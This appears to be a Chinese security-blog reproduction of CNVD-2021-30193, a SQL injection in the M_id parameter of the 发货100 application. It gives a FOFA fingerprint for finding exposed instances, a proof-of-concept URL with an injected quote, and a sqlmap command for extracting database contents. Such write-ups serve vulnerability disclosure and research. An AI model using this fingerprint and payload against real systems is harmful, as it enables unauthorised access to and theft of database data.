# 发货100 M_id SQL注入漏洞 CNVD-2021-30193
## 漏洞描述
发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
> [!NOTE]
>
> 发货100
## FOFA
> [!NOTE]
>
> icon_hash=”1420424513″
## 漏洞复现
主页面如下
使用POC
“`
/?M_id=1%27&type=product
“`
数据库出现报错, 使用Sqlmap注入
“`
sqlmap -u ‘http://xxx.xxx.xxx.xxx/?M_id=11%27&type=product’ -p M_id
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容